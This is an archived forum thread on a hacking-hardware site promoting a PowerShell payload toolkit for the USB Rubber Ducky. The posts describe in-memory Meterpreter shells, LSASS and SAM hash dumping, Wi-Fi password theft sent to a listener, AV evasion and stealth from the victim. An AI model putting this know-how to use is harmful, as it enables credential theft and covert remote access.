Jump to content

Archived

This topic is now archived and is closed to further replies.

b00stfr3ak

Power Ducky ToolKit

Recommended Posts

This script is menu driven and will create the txt and bin file for you. When needed it will also set up a listener. Let me know what you guys think! Also if any one wants to add to the script, it should be pretty easy all the files are separated for re-usability



Power Shell Scripts for the Hak5 Ducky


1) Fast Meterpreter

2) Reverse Meterpreter

3) Dump Domain and Local Hashes

4) Dump Lsass Process

5) Dump Wifi Passwords

6) Wget Execute

99) Exit


All payloads are written in powershell so nothing should be caught by AV


https://github.com/b00stfr3ak/power-ducky



Fast Meterpreter



Stores the meterpreter script on a web sever, the ducky will then go grab the script using ssl and execute it on the victims machine.



Reverse Meterpreter


Creates a reverse meterpreter shell through powershell injection


Dump Domain and Local Hashes


Makes a copy of the sam and sys file, and then dumps those files through a tcp socket to a listening server.


Dump Lsass Process


Dumps the lsass process through powershell, then reads the file and dumps it through a tcp socket to a listening server.


Dump Wifi Passwords


Dumps all available wifi profiles, and then dumps each file through a tcp socket


Wget Execute


Downloads a file and executes it on the victim's machine

Share this post


Link to post
Share on other sites

The power-ducky toolkit has been updated to support SSL. Now you can transfer files from the victim to the attacker all encrypted. It does take a while with larger files however it does work, and happens in the background on the victim computer so they wont notice. Once the correct reg files are downloaded the script will print the hashes to the screen and write them to a file

Share this post


Link to post
Share on other sites

Fast Meterpreter has been added to the power-ducky toolkit. This payload stores a meterpreter script on a web server and then all the ducky has to do is download that script through ssl and then execute it. The beauty about this script is that it is 10 lines long and the actual powershell command is less then 200 characters.

Ideas from:

http://www.pentestgeek.com/2013/09/18/invoke-shellcode/

https://forums.hak5.org/index.php?/topic/30398-payload-the-fastest-meterpreter-shell-youll-ever-get/

Share this post


Link to post
Share on other sites

Has anyone tried this?

It looks good b00stfr3ak, please keep up the great work.

I would try it but I'm away for a few days.

When I get back and try it, I'll give some feedback as best I can.

I'm a bit new to the Ducky, and very glad to see people still coming up with stuff for it.

Share this post


Link to post
Share on other sites

Have you tried implementing Invoke-mimikatz, from powersploit.

This could be implemented. I would just need to ask if I could use his script.

Also how does the dump domain hashes work. I thought you could only dump domain hashes from NTDS.DIT file.

If a computer is on the domain by default it keeps a number of cached credentials stored just in case the workstation can't talk to the domain controller.

Share this post


Link to post
Share on other sites

Hey b00stfr3ak, it's factgasm here, also known as Noobero Uno :rolleyes: .

Could you put together a video to demonstrate the use of Power Ducky Toolkit, please? That would be unbelievably useful.

I dropped the inject.bin file on to my micro SD card then inserted that into a target machine via the Ducky and, hey presto, the script ran (hex encoded?).

I wasn't quite sure what to expect.

Once the script stopped running and the command shell closed, nothing obvious appeared to happen on the desktop. I assume the aim of the exploit was to allow a reverse shell to the attacking machine (among other things) which Darren covers in the one of the Hak5 videos. If that's the case I'm going to have to revisit that video until I have the procedure down to a fine art.

You mention that its possible to "6) Wget Execute".

Sounds excellent, that's exactly one of the things I want my Ducky to be able to do. However in looking at the documentation I'm not sure how to go about tailoring the source code in order that it downloads the particular file I want from the particular source website as it appears your source code is written in Ruby.

Please help!

[/thick]

Share this post


Link to post
Share on other sites

Hey b00stfr3ak, it's factgasm here, also known as Noobero Uno :rolleyes: .

Could you put together a video to demonstrate the use of Power Ducky Toolkit, please? That would be unbelievably useful.

I dropped the inject.bin file on to my micro SD card then inserted that into a target machine via the Ducky and, hey presto, the script ran (hex encoded?).

I wasn't quite sure what to expect.

Once the script stopped running and the command shell closed, nothing obvious appeared to happen on the desktop. I assume the aim of the exploit was to allow a reverse shell to the attacking machine (among other things) which Darren covers in the one of the Hak5 videos. If that's the case I'm going to have to revisit that video until I have the procedure down to a fine art.

You mention that its possible to "6) Wget Execute".

Sounds excellent, that's exactly one of the things I want my Ducky to be able to do. However in looking at the documentation I'm not sure how to go about tailoring the source code in order that it downloads the particular file I want from the particular source website as it appears your source code is written in Ruby.

Please help!

[/thick]

It would be a good idea to create some video's on this, I just haven't had time. Can you clone the newest repo, this should get rid of the hex option (it was broke and took to much time). The best option to try is fast meterpreter. It is the fastest command and an instant meterpreter shell in memory (so no AV to worry about). Wget Execute is OK but then you have to worry about dropping a binary file and not get caught by AV

Share this post


Link to post
Share on other sites

I tried to make the videos today but they didn't turn out right. If any one knows of a screen recording software for Linux that is low recourse, please list it. I have updated the repo and tested it on a new kali box and confirmed the scripts are working.

Share this post


Link to post
Share on other sites

possible to allow the script to set 'host ip' to a hostname as well?

Does the script fail with DNS names? It should just pass everything to metasploit. I'll take a look tonight. I plan on re-writting the tool, because the code looks so bad.

Share this post


Link to post
Share on other sites

Is it possible to have a sub menu option to set the Meterpreter IP's on the fly (as I use a Multi-hop VPN and my Metasploit IP can change), also add an option to drop a file to load a new Meterpreter into memory at boot up.

Share this post


Link to post
Share on other sites

b00stfr3ak,

can you post some instructions on how to properly edit the files and what info is needed to get all of the options setup and running correctly?? Greatly Appreciated, Keep up the AWESOME Work!!

Share this post


Link to post
Share on other sites

Hello b00stfr3ak

Powerducky is a great tool however the latest version checked in github has some issues...

It seems there was some syntax issue in the main menu.. and the payload to add a user to the admin group fails, since the localadmin word is misspelled.

For the reverse shell attack I am able to make it work from the rubber ducky, the payload is injected and i got a message in my attacking machine (sending stage to victim xx bytes) but it hangs there.... I tried to use the meterpreter X64 (since my victim machine uses an x64 architecture) but powershell just dies in the victim machine. It seems the payload needs to be specific for a x64 victim and your payload in github is specific for 32 bits.. do you have a reverse shell payload for x64? thank you....

Share this post


Link to post
Share on other sites

Hello b00stfr3ak

Powerducky is a great tool however the latest version checked in github has some issues...

It seems there was some syntax issue in the main menu.. and the payload to add a user to the admin group fails, since the localadmin word is misspelled.

For the reverse shell attack I am able to make it work from the rubber ducky, the payload is injected and i got a message in my attacking machine (sending stage to victim xx bytes) but it hangs there.... I tried to use the meterpreter X64 (since my victim machine uses an x64 architecture) but powershell just dies in the victim machine. It seems the payload needs to be specific for a x64 victim and your payload in github is specific for 32 bits.. do you have a reverse shell payload for x64? thank you....

Thanks, I fixed the add admin syntax and it has been pushed to github.

What are the syntax issues with the main menu?

x32 works on x64 OS. It might have been a network issue, because the powershell code did reach the metasploit server. I'm thinking about adding the option to not use a stager, but i'll have to do that later.

For any issues can you post them to github so I can keep track of them. Thanks!

Share this post


Link to post
Share on other sites

This script is menu driven and will create the txt and bin file for you. When needed it will also set up a listener. Let me know what you guys think! Also if any one wants to add to the script, it should be pretty easy all the files are separated for re-usability

Power Shell Scripts for the Hak5 Ducky

1) Fast Meterpreter
2) Reverse Meterpreter
3) Dump Domain and Local Hashes
4) Dump Lsass Process
5) Dump Wifi Passwords
6) Wget Execute
99) Exit

All payloads are written in powershell so nothing should be caught by AV

https://github.com/b00stfr3ak/power-ducky

Fast Meterpreter

Stores the meterpreter script on a web sever, the ducky will then go grab the script using ssl and execute it on the victims machine.

Reverse Meterpreter
Creates a reverse meterpreter shell through powershell injection
Dump Domain and Local Hashes
Makes a copy of the sam and sys file, and then dumps those files through a tcp socket to a listening server.
Dump Lsass Process
Dumps the lsass process through powershell, then reads the file and dumps it through a tcp socket to a listening server.
Dump Wifi Passwords
Dumps all available wifi profiles, and then dumps each file through a tcp socket
Wget Execute
Downloads a file and executes it on the victim's machine

how do i set this up to work in the ducky?

Share this post


Link to post
Share on other sites

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...